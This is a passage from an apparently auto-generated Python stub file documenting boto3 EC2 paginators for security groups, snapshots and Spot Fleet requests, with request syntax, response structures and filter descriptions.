- **PrefixListIds** *(list) --*
[VPC only] The prefix list IDs for an AWS service. With outbound rules, this is the AWS service to access through a VPC endpoint from instances associated with the security group.
- *(dict) --*
Describes a prefix list ID.
- **Description** *(string) --*
A description for the security group rule that references this prefix list ID.
Constraints: Up to 255 characters in length. Allowed characters are a-z, A-Z, 0-9, spaces, and ._-:/()#,@[]+=;{}!$*
- **PrefixListId** *(string) --*
The ID of the prefix.
- **ToPort** *(integer) --*
The end of port range for the TCP and UDP protocols, or an ICMP/ICMPv6 code. A value of ``-1`` indicates all ICMP/ICMPv6 codes. If you specify all ICMP/ICMPv6 types, you must specify all codes.
- **UserIdGroupPairs** *(list) --*
The security group and AWS account ID pairs.
- *(dict) --*
Describes a security group and AWS account ID pair.
- **Description** *(string) --*
A description for the security group rule that references this user ID group pair.
Constraints: Up to 255 characters in length. Allowed characters are a-z, A-Z, 0-9, spaces, and ._-:/()#,@[]+=;{}!$*
- **GroupId** *(string) --*
The ID of the security group.
- **GroupName** *(string) --*
The name of the security group. In a request, use this parameter for a security group in EC2-Classic or a default VPC only. For a security group in a nondefault VPC, use the security group ID.
For a referenced security group in another VPC, this value is not returned if the referenced security group is deleted.
- **PeeringStatus** *(string) --*
The status of a VPC peering connection, if applicable.
- **UserId** *(string) --*
The ID of an AWS account.
For a referenced security group in another VPC, the account ID of the referenced security group is returned in the response. If the referenced security group is deleted, this value is not returned.
[EC2-Classic] Required when adding or removing rules that reference a security group in another AWS account.
- **VpcId** *(string) --*
The ID of the VPC for the referenced security group, if applicable.
- **VpcPeeringConnectionId** *(string) --*
The ID of the VPC peering connection, if applicable.
- **Tags** *(list) --*
Any tags assigned to the security group.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
- **VpcId** *(string) --*
[VPC only] The ID of the VPC for the security group.
:type Filters: list
:param Filters:
The filters. If using multiple filters for rules, the results include security groups for which any combination of rules - not necessarily a single rule - match all filters.
* ``description`` - The description of the security group.
* ``egress.ip-permission.cidr`` - An IPv4 CIDR block for an outbound security group rule.
* ``egress.ip-permission.from-port`` - For an outbound rule, the start of port range for the TCP and UDP protocols, or an ICMP type number.
* ``egress.ip-permission.group-id`` - The ID of a security group that has been referenced in an outbound security group rule.
* ``egress.ip-permission.group-name`` - The name of a security group that has been referenced in an outbound security group rule.
* ``egress.ip-permission.ipv6-cidr`` - An IPv6 CIDR block for an outbound security group rule.
* ``egress.ip-permission.prefix-list-id`` - The ID (prefix) of the AWS service to which a security group rule allows outbound access.
* ``egress.ip-permission.protocol`` - The IP protocol for an outbound security group rule (``tcp`` | ``udp`` | ``icmp`` or a protocol number).
* ``egress.ip-permission.to-port`` - For an outbound rule, the end of port range for the TCP and UDP protocols, or an ICMP code.
* ``egress.ip-permission.user-id`` - The ID of an AWS account that has been referenced in an outbound security group rule.
* ``group-id`` - The ID of the security group.
* ``group-name`` - The name of the security group.
* ``ip-permission.cidr`` - An IPv4 CIDR block for an inbound security group rule.
* ``ip-permission.from-port`` - For an inbound rule, the start of port range for the TCP and UDP protocols, or an ICMP type number.
* ``ip-permission.group-id`` - The ID of a security group that has been referenced in an inbound security group rule.
* ``ip-permission.group-name`` - The name of a security group that has been referenced in an inbound security group rule.
* ``ip-permission.ipv6-cidr`` - An IPv6 CIDR block for an inbound security group rule.
* ``ip-permission.prefix-list-id`` - The ID (prefix) of the AWS service from which a security group rule allows inbound access.
* ``ip-permission.protocol`` - The IP protocol for an inbound security group rule (``tcp`` | ``udp`` | ``icmp`` or a protocol number).
* ``ip-permission.to-port`` - For an inbound rule, the end of port range for the TCP and UDP protocols, or an ICMP code.
* ``ip-permission.user-id`` - The ID of an AWS account that has been referenced in an inbound security group rule.
* ``owner-id`` - The AWS account ID of the owner of the security group.
* ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
* ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
* ``vpc-id`` - The ID of the VPC specified when the security group was created.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type GroupIds: list
:param GroupIds:
The IDs of the security groups. Required for security groups in a nondefault VPC.
Default: Describes all your security groups.
- *(string) --*
:type GroupNames: list
:param GroupNames:
[EC2-Classic and default VPC only] The names of the security groups. You can specify either the security group name or the security group ID. For security groups in a nondefault VPC, use the ``group-name`` filter to describe security groups by name.
Default: Describes all your security groups.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeSnapshots(Paginator):
def paginate(self, Filters: List = None, OwnerIds: List = None, RestorableByUserIds: List = None, SnapshotIds: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_snapshots`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeSnapshots>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
OwnerIds=[
'string',
],
RestorableByUserIds=[
'string',
],
SnapshotIds=[
'string',
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Snapshots': [
{
'DataEncryptionKeyId': 'string',
'Description': 'string',
'Encrypted': True|False,
'KmsKeyId': 'string',
'OwnerId': 'string',
'Progress': 'string',
'SnapshotId': 'string',
'StartTime': datetime(2015, 1, 1),
'State': 'pending'|'completed'|'error',
'StateMessage': 'string',
'VolumeId': 'string',
'VolumeSize': 123,
'OwnerAlias': 'string',
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
],
}
**Response Structure**
- *(dict) --*
- **Snapshots** *(list) --*
Information about the snapshots.
- *(dict) --*
Describes a snapshot.
- **DataEncryptionKeyId** *(string) --*
The data encryption key identifier for the snapshot. This value is a unique identifier that corresponds to the data encryption key that was used to encrypt the original volume or snapshot copy. Because data encryption keys are inherited by volumes created from snapshots, and vice versa, if snapshots share the same data encryption key identifier, then they belong to the same volume/snapshot lineage. This parameter is only returned by the DescribeSnapshots API operation.
- **Description** *(string) --*
The description for the snapshot.
- **Encrypted** *(boolean) --*
Indicates whether the snapshot is encrypted.
- **KmsKeyId** *(string) --*
The full ARN of the AWS Key Management Service (AWS KMS) customer master key (CMK) that was used to protect the volume encryption key for the parent volume.
- **OwnerId** *(string) --*
The AWS account ID of the EBS snapshot owner.
- **Progress** *(string) --*
The progress of the snapshot, as a percentage.
- **SnapshotId** *(string) --*
The ID of the snapshot. Each snapshot receives a unique identifier when it is created.
- **StartTime** *(datetime) --*
The time stamp when the snapshot was initiated.
- **State** *(string) --*
The snapshot state.
- **StateMessage** *(string) --*
Encrypted Amazon EBS snapshots are copied asynchronously. If a snapshot copy operation fails (for example, if the proper AWS Key Management Service (AWS KMS) permissions are not obtained) this field displays error state details to help you diagnose why the error occurred. This parameter is only returned by the DescribeSnapshots API operation.
- **VolumeId** *(string) --*
The ID of the volume that was used to create the snapshot. Snapshots created by the CopySnapshot action have an arbitrary volume ID that should not be used for any purpose.
- **VolumeSize** *(integer) --*
The size of the volume, in GiB.
- **OwnerAlias** *(string) --*
Value from an Amazon-maintained list (``amazon`` | ``self`` | ``all`` | ``aws-marketplace`` | ``microsoft`` ) of snapshot owners. Not to be confused with the user-configured AWS account alias, which is set from the IAM console.
- **Tags** *(list) --*
Any tags assigned to the snapshot.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
:type Filters: list
:param Filters:
The filters.
* ``description`` - A description of the snapshot.
* ``encrypted`` - Indicates whether the snapshot is encrypted (``true`` | ``false`` )
* ``owner-alias`` - Value from an Amazon-maintained list (``amazon`` | ``self`` | ``all`` | ``aws-marketplace`` | ``microsoft`` ) of snapshot owners. Not to be confused with the user-configured AWS account alias, which is set from the IAM console.
* ``owner-id`` - The ID of the AWS account that owns the snapshot.
* ``progress`` - The progress of the snapshot, as a percentage (for example, 80%).
* ``snapshot-id`` - The snapshot ID.
* ``start-time`` - The time stamp when the snapshot was initiated.
* ``status`` - The status of the snapshot (``pending`` | ``completed`` | ``error`` ).
* ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
* ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
* ``volume-id`` - The ID of the volume the snapshot is for.
* ``volume-size`` - The size of the volume, in GiB.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type OwnerIds: list
:param OwnerIds:
Describes the snapshots owned by these owners.
- *(string) --*
:type RestorableByUserIds: list
:param RestorableByUserIds:
The IDs of the AWS accounts that can create volumes from the snapshot.
- *(string) --*
:type SnapshotIds: list
:param SnapshotIds:
The snapshot IDs.
Default: Describes the snapshots for which you have create volume permissions.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeSpotFleetInstances(Paginator):
def paginate(self, SpotFleetRequestId: str, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_spot_fleet_instances`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeSpotFleetInstances>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
SpotFleetRequestId='string',
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'ActiveInstances': [
{
'InstanceId': 'string',
'InstanceType': 'string',
'SpotInstanceRequestId': 'string',
'InstanceHealth': 'healthy'|'unhealthy'
},
],
'SpotFleetRequestId': 'string'
}
**Response Structure**
- *(dict) --*
Contains the output of DescribeSpotFleetInstances.
- **ActiveInstances** *(list) --*
The running instances. This list is refreshed periodically and might be out of date.
- *(dict) --*
Describes a running instance in a Spot Fleet.
- **InstanceId** *(string) --*
The ID of the instance.
- **InstanceType** *(string) --*
The instance type.
- **SpotInstanceRequestId** *(string) --*
The ID of the Spot Instance request.
- **InstanceHealth** *(string) --*
The health status of the instance. If the status of either the instance status check or the system status check is ``impaired`` , the health status of the instance is ``unhealthy`` . Otherwise, the health status is ``healthy`` .
- **SpotFleetRequestId** *(string) --*
The ID of the Spot Fleet request.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type SpotFleetRequestId: string
:param SpotFleetRequestId: **[REQUIRED]**
The ID of the Spot Fleet request.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeSpotFleetRequests(Paginator):
def paginate(self, DryRun: bool = None, SpotFleetRequestIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_spot_fleet_requests`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeSpotFleetRequests>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
SpotFleetRequestIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'SpotFleetRequestConfigs': [
{
'ActivityStatus': 'error'|'pending_fulfillment'|'pending_termination'|'fulfilled',
'CreateTime': datetime(2015, 1, 1),
'SpotFleetRequestConfig': {
'AllocationStrategy': 'lowestPrice'|'diversified',
'OnDemandAllocationStrategy': 'lowestPrice'|'prioritized',
'ClientToken': 'string',
'ExcessCapacityTerminationPolicy': 'noTermination'|'default',
'FulfilledCapacity': 123.0,
'OnDemandFulfilledCapacity': 123.0,
'IamFleetRole': 'string',
'LaunchSpecifications': [
{
'SecurityGroups': [
{
'GroupName': 'string',
'GroupId': 'string'
},
],
'AddressingType': 'string',
'BlockDeviceMappings': [
{
'DeviceName': 'string',
'VirtualName': 'string',
'Ebs': {
'DeleteOnTermination': True|False,
'Iops': 123,
'SnapshotId': 'string',
'VolumeSize': 123,
'VolumeType': 'standard'|'io1'|'gp2'|'sc1'|'st1',
'Encrypted': True|False,
'KmsKeyId': 'string'
},
'NoDevice': 'string'
},
],
'EbsOptimized': True|False,
'IamInstanceProfile': {
'Arn': 'string',
'Name': 'string'
},
'ImageId': 'string',
'InstanceType': 't1.micro'|'t2.nano'|'t2.micro'|'t2.small'|'t2.medium'|'t2.large'|'t2.xlarge'|'t2.2xlarge'|'t3.nano'|'t3.micro'|'t3.small'|'t3.medium'|'t3.large'|'t3.xlarge'|'t3.2xlarge'|'t3a.nano'|'t3a.micro'|'t3a.small'|'t3a.medium'|'t3a.large'|'t3a.xlarge'|'t3a.2xlarge'|'m1.small'|'m1.medium'|'m1.large'|'m1.xlarge'|'m3.medium'|'m3.large'|'m3.xlarge'|'m3.2xlarge'|'m4.large'|'m4.xlarge'|'m4.2xlarge'|'m4.4xlarge'|'m4.10xlarge'|'m4.16xlarge'|'m2.xlarge'|'m2.2xlarge'|'m2.4xlarge'|'cr1.8xlarge'|'r3.large'|'r3.xlarge'|'r3.2xlarge'|'r3.4xlarge'|'r3.8xlarge'|'r4.large'|'r4.xlarge'|'r4.2xlarge'|'r4.4xlarge'|'r4.8xlarge'|'r4.16xlarge'|'r5.large'|'r5.xlarge'|'r5.2xlarge'|'r5.4xlarge'|'r5.12xlarge'|'r5.24xlarge'|'r5.metal'|'r5a.large'|'r5a.xlarge'|'r5a.2xlarge'|'r5a.4xlarge'|'r5a.12xlarge'|'r5a.24xlarge'|'r5d.large'|'r5d.xlarge'|'r5d.2xlarge'|'r5d.4xlarge'|'r5d.12xlarge'|'r5d.24xlarge'|'r5d.metal'|'r5ad.large'|'r5ad.xlarge'|'r5ad.2xlarge'|'r5ad.4xlarge'|'r5ad.8xlarge'|'r5ad.12xlarge'|'r5ad.16xlarge'|'r5ad.24xlarge'|'x1.16xlarge'|'x1.32xlarge'|'x1e.xlarge'|'x1e.2xlarge'|'x1e.4xlarge'|'x1e.8xlarge'|'x1e.16xlarge'|'x1e.32xlarge'|'i2.xlarge'|'i2.2xlarge'|'i2.4xlarge'|'i2.8xlarge'|'i3.large'|'i3.xlarge'|'i3.2xlarge'|'i3.4xlarge'|'i3.8xlarge'|'i3.16xlarge'|'i3.metal'|'hi1.4xlarge'|'hs1.8xlarge'|'c1.medium'|'c1.xlarge'|'c3.large'|'c3.xlarge'|'c3.2xlarge'|'c3.4xlarge'|'c3.8xlarge'|'c4.large'|'c4.xlarge'|'c4.2xlarge'|'c4.4xlarge'|'c4.8xlarge'|'c5.large'|'c5.xlarge'|'c5.2xlarge'|'c5.4xlarge'|'c5.9xlarge'|'c5.18xlarge'|'c5d.large'|'c5d.xlarge'|'c5d.2xlarge'|'c5d.4xlarge'|'c5d.9xlarge'|'c5d.18xlarge'|'c5n.large'|'c5n.xlarge'|'c5n.2xlarge'|'c5n.4xlarge'|'c5n.9xlarge'|'c5n.18xlarge'|'cc1.4xlarge'|'cc2.8xlarge'|'g2.2xlarge'|'g2.8xlarge'|'g3.4xlarge'|'g3.8xlarge'|'g3.16xlarge'|'g3s.xlarge'|'cg1.4xlarge'|'p2.xlarge'|'p2.8xlarge'|'p2.16xlarge'|'p3.2xlarge'|'p3.8xlarge'|'p3.16xlarge'|'p3dn.24xlarge'|'d2.xlarge'|'d2.2xlarge'|'d2.4xlarge'|'d2.8xlarge'|'f1.2xlarge'|'f1.4xlarge'|'f1.16xlarge'|'m5.large'|'m5.xlarge'|'m5.2xlarge'|'m5.4xlarge'|'m5.12xlarge'|'m5.24xlarge'|'m5.metal'|'m5a.large'|'m5a.xlarge'|'m5a.2xlarge'|'m5a.4xlarge'|'m5a.12xlarge'|'m5a.24xlarge'|'m5d.large'|'m5d.xlarge'|'m5d.2xlarge'|'m5d.4xlarge'|'m5d.12xlarge'|'m5d.24xlarge'|'m5d.metal'|'m5ad.large'|'m5ad.xlarge'|'m5ad.2xlarge'|'m5ad.4xlarge'|'m5ad.8xlarge'|'m5ad.12xlarge'|'m5ad.16xlarge'|'m5ad.24xlarge'|'h1.2xlarge'|'h1.4xlarge'|'h1.8xlarge'|'h1.16xlarge'|'z1d.large'|'z1d.xlarge'|'z1d.2xlarge'|'z1d.3xlarge'|'z1d.6xlarge'|'z1d.12xlarge'|'z1d.metal'|'u-6tb1.metal'|'u-9tb1.metal'|'u-12tb1.metal'|'a1.medium'|'a1.large'|'a1.xlarge'|'a1.2xlarge'|'a1.4xlarge',
'KernelId': 'string',
'KeyName': 'string',
'Monitoring': {
'Enabled': True|False
},
'NetworkInterfaces': [
{
'AssociatePublicIpAddress': True|False,
'DeleteOnTermination': True|False,
'Description': 'string',
'DeviceIndex': 123,
'Groups': [
'string',
],
'Ipv6AddressCount': 123,
'Ipv6Addresses': [
{
'Ipv6Address': 'string'
},
],
'NetworkInterfaceId': 'string',
'PrivateIpAddress': 'string',
'PrivateIpAddresses': [
{
'Primary': True|False,
'PrivateIpAddress': 'string'
},
],
'SecondaryPrivateIpAddressCount': 123,
'SubnetId': 'string',
'InterfaceType': 'string'
},
],
'Placement': {
'AvailabilityZone': 'string',
'GroupName': 'string',
'Tenancy': 'default'|'dedicated'|'host'
},
'RamdiskId': 'string',
'SpotPrice': 'string',
'SubnetId': 'string',
'UserData': 'string',
'WeightedCapacity': 123.0,
'TagSpecifications': [
{
'ResourceType': 'client-vpn-endpoint'|'customer-gateway'|'dedicated-host'|'dhcp-options'|'elastic-ip'|'fleet'|'fpga-image'|'host-reservation'|'image'|'instance'|'internet-gateway'|'launch-template'|'natgateway'|'network-acl'|'network-interface'|'reserved-instances'|'route-table'|'security-group'|'snapshot'|'spot-instances-request'|'subnet'|'transit-gateway'|'transit-gateway-attachment'|'transit-gateway-route-table'|'volume'|'vpc'|'vpc-peering-connection'|'vpn-connection'|'vpn-gateway',
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
]
},
],
'LaunchTemplateConfigs': [
{
'LaunchTemplateSpecification': {
'LaunchTemplateId': 'string',
'LaunchTemplateName': 'string',
'Version': 'string'
},
'Overrides': [
{
'InstanceType': 't1.micro'|'t2.nano'|'t2.micro'|'t2.small'|'t2.medium'|'t2.large'|'t2.xlarge'|'t2.2xlarge'|'t3.nano'|'t3.micro'|'t3.small'|'t3.medium'|'t3.large'|'t3.xlarge'|'t3.2xlarge'|'t3a.nano'|'t3a.micro'|'t3a.small'|'t3a.medium'|'t3a.large'|'t3a.xlarge'|'t3a.2xlarge'|'m1.small'|'m1.medium'|'m1.large'|'m1.xlarge'|'m3.medium'|'m3.large'|'m3.xlarge'|'m3.2xlarge'|'m4.large'|'m4.xlarge'|'m4.2xlarge'|'m4.4xlarge'|'m4.10xlarge'|'m4.16xlarge'|'m2.xlarge'|'m2.2xlarge'|'m2.4xlarge'|'cr1.8xlarge'|'r3.large'|'r3.xlarge'|'r3.2xlarge'|'r3.4xlarge'|'r3.8xlarge'|'r4.large'|'r4.xlarge'|'r4.2xlarge'|'r4.4xlarge'|'r4.8xlarge'|'r4.16xlarge'|'r5.large'|'r5.xlarge'|'r5.2xlarge'|'r5.4xlarge'|'r5.12xlarge'|'r5.24xlarge'|'r5.metal'|'r5a.large'|'r5a.xlarge'|'r5a.2xlarge'|'r5a.4xlarge'|'r5a.12xlarge'|'r5a.24xlarge'|'r5d.large'|'r5d.xlarge'|'r5d.2xlarge'|'r5d.4xlarge'|'r5d.12xlarge'|'r5d.24xlarge'|'r5d.metal'|'r5ad.large'|'r5ad.xlarge'|'r5ad.2xlarge'|'r5ad.4xlarge'|'r5ad.8xlarge'|'r5ad.12xlarge'|'r5ad.16xlarge'|'r5ad.24xlarge'|'x1.16xlarge'|'x1.32xlarge'|'x1e.xlarge'|'x1e.2xlarge'|'x1e.4xlarge'|'x1e.8xlarge'|'x1e.16xlarge'|'x1e.32xlarge'|'i2.xlarge'|'i2.2xlarge'|'i2.4xlarge'|'i2.8xlarge'|'i3.large'|'i3.xlarge'|'i3.2xlarge'|'i3.4xlarge'|'i3.8xlarge'|'i3.16xlarge'|'i3.metal'|'hi1.4xlarge'|'hs1.8xlarge'|'c1.medium'|'c1.xlarge'|'c3.large'|'c3.xlarge'|'c3.2xlarge'|'c3.4xlarge'|'c3.8xlarge'|'c4.large'|'c4.xlarge'|'c4.2xlarge'|'c4.4xlarge'|'c4.8xlarge'|'c5.large'|'c5.xlarge'|'c5.2xlarge'|'c5.4xlarge'|'c5.9xlarge'|'c5.18xlarge'|'c5d.large'|'c5d.xlarge'|'c5d.2xlarge'|'c5d.4xlarge'|'c5d.9xlarge'|'c5d.18xlarge'|'c5n.large'|'c5n.xlarge'|'c5n.2xlarge'|'c5n.4xlarge'|'c5n.9xlarge'|'c5n.18xlarge'|'cc1.4xlarge'|'cc2.8xlarge'|'g2.2xlarge'|'g2.8xlarge'|'g3.4xlarge'|'g3.8xlarge'|'g3.16xlarge'|'g3s.xlarge'|'cg1.4xlarge'|'p2.xlarge'|'p2.8xlarge'|'p2.16xlarge'|'p3.2xlarge'|'p3.8xlarge'|'p3.16xlarge'|'p3dn.24xlarge'|'d2.xlarge'|'d2.2xlarge'|'d2.4xlarge'|'d2.8xlarge'|'f1.2xlarge'|'f1.4xlarge'|'f1.16xlarge'|'m5.large'|'m5.xlarge'|'m5.2xlarge'|'m5.4xlarge'|'m5.12xlarge'|'m5.24xlarge'|'m5.metal'|'m5a.large'|'m5a.xlarge'|'m5a.2xlarge'|'m5a.4xlarge'|'m5a.12xlarge'|'m5a.24xlarge'|'m5d.large'|'m5d.xlarge'|'m5d.2xlarge'|'m5d.4xlarge'|'m5d.12xlarge'|'m5d.24xlarge'|'m5d.metal'|'m5ad.large'|'m5ad.xlarge'|'m5ad.2xlarge'|'m5ad.4xlarge'|'m5ad.8xlarge'|'m5ad.12xlarge'|'m5ad.16xlarge'|'m5ad.24xlarge'|'h1.2xlarge'|'h1.4xlarge'|'h1.8xlarge'|'h1.16xlarge'|'z1d.large'|'z1d.xlarge'|'z1d.2xlarge'|'z1d.3xlarge'|'z1d.6xlarge'|'z1d.12xlarge'|'z1d.metal'|'u-6tb1.metal'|'u-9tb1.metal'|'u-12tb1.metal'|'a1.medium'|'a1.large'|'a1.xlarge'|'a1.2xlarge'|'a1.4xlarge',
'SpotPrice': 'string',
'SubnetId': 'string',
'AvailabilityZone': 'string',
'WeightedCapacity': 123.0,
'Priority': 123.0
},
]
},
],
'SpotPrice': 'string',
'TargetCapacity': 123,
'OnDemandTargetCapacity': 123,
'TerminateInstancesWithExpiration': True|False,
'Type': 'request'|'maintain'|'instant',
'ValidFrom': datetime(2015, 1, 1),
'ValidUntil': datetime(2015, 1, 1),
'ReplaceUnhealthyInstances': True|False,
'InstanceInterruptionBehavior': 'hibernate'|'stop'|'terminate',
'LoadBalancersConfig': {
'ClassicLoadBalancersConfig': {
'ClassicLoadBalancers': [
{
'Name': 'string'
},
]
},
'TargetGroupsConfig': {
'TargetGroups': [
{
'Arn': 'string'
},
]
}
},
'InstancePoolsToUseCount': 123
},
'SpotFleetRequestId': 'string',
'SpotFleetRequestState': 'submitted'|'active'|'cancelled'|'failed'|'cancelled_running'|'cancelled_terminating'|'modifying'
},
]
}
**Response Structure**
- *(dict) --*
Contains the output of DescribeSpotFleetRequests.
- **SpotFleetRequestConfigs** *(list) --*
Information about the configuration of your Spot Fleet.
- *(dict) --*
Describes a Spot Fleet request.
- **ActivityStatus** *(string) --*
The progress of the Spot Fleet request. If there is an error, the status is ``error`` . After all requests are placed, the status is ``pending_fulfillment`` . If the size of the fleet is equal to or greater than its target capacity, the status is ``fulfilled`` . If the size of the fleet is decreased, the status is ``pending_termination`` while Spot Instances are terminating.
- **CreateTime** *(datetime) --*
The creation date and time of the request.
- **SpotFleetRequestConfig** *(dict) --*
The configuration of the Spot Fleet request.
- **AllocationStrategy** *(string) --*
Indicates how to allocate the target capacity across the Spot pools specified by the Spot Fleet request. The default is ``lowestPrice`` .
- **OnDemandAllocationStrategy** *(string) --*
The order of the launch template overrides to use in fulfilling On-Demand capacity. If you specify ``lowestPrice`` , Spot Fleet uses price to determine the order, launching the lowest price first. If you specify ``prioritized`` , Spot Fleet uses the priority that you assign to each Spot Fleet launch template override, launching the highest priority first. If you do not specify a value, Spot Fleet defaults to ``lowestPrice`` .
- **ClientToken** *(string) --*
A unique, case-sensitive identifier that you provide to ensure the idempotency of your listings. This helps to avoid duplicate listings. For more information, see `Ensuring Idempotency <https://docs.aws.amazon.com/AWSEC2/latest/APIReference/Run_Instance_Idempotency.html>`__ .
- **ExcessCapacityTerminationPolicy** *(string) --*
Indicates whether running Spot Instances should be terminated if the target capacity of the Spot Fleet request is decreased below the current size of the Spot Fleet.
- **FulfilledCapacity** *(float) --*
The number of units fulfilled by this request compared to the set target capacity. You cannot set this value.
- **OnDemandFulfilledCapacity** *(float) --*
The number of On-Demand units fulfilled by this request compared to the set target On-Demand capacity.
- **IamFleetRole** *(string) --*
Grants the Spot Fleet permission to terminate Spot Instances on your behalf when you cancel its Spot Fleet request using CancelSpotFleetRequests or when the Spot Fleet request expires, if you set ``terminateInstancesWithExpiration`` .
- **LaunchSpecifications** *(list) --*
The launch specifications for the Spot Fleet request. If you specify ``LaunchSpecifications`` , you can't specify ``LaunchTemplateConfigs`` .
- *(dict) --*
Describes the launch specification for one or more Spot Instances.
- **SecurityGroups** *(list) --*
One or more security groups. When requesting instances in a VPC, you must specify the IDs of the security groups. When requesting instances in EC2-Classic, you can specify the names or the IDs of the security groups.
- *(dict) --*
Describes a security group.
- **GroupName** *(string) --*
The name of the security group.
- **GroupId** *(string) --*
The ID of the security group.
- **AddressingType** *(string) --*
Deprecated.
- **BlockDeviceMappings** *(list) --*
One or more block device mapping entries. You can't specify both a snapshot ID and an encryption value. This is because only blank volumes can be encrypted on creation. If a snapshot is the basis for a volume, it is not blank and its encryption status is used for the volume encryption status.
- *(dict) --*
Describes a block device mapping.
- **DeviceName** *(string) --*
The device name (for example, ``/dev/sdh`` or ``xvdh`` ).
- **VirtualName** *(string) --*
The virtual device name (``ephemeral`` N). Instance store volumes are numbered starting from 0. An instance type with 2 available instance store volumes can specify mappings for ``ephemeral0`` and ``ephemeral1`` . The number of available instance store volumes depends on the instance type. After you connect to the instance, you must mount the volume.
NVMe instance store volumes are automatically enumerated and assigned a device name. Including them in your block device mapping has no effect.
Constraints: For M3 instances, you must specify instance store volumes in the block device mapping for the instance. When you launch an M3 instance, we ignore any instance store volumes specified in the block device mapping for the AMI.
- **Ebs** *(dict) --*
Parameters used to automatically set up EBS volumes when the instance is launched.
- **DeleteOnTermination** *(boolean) --*
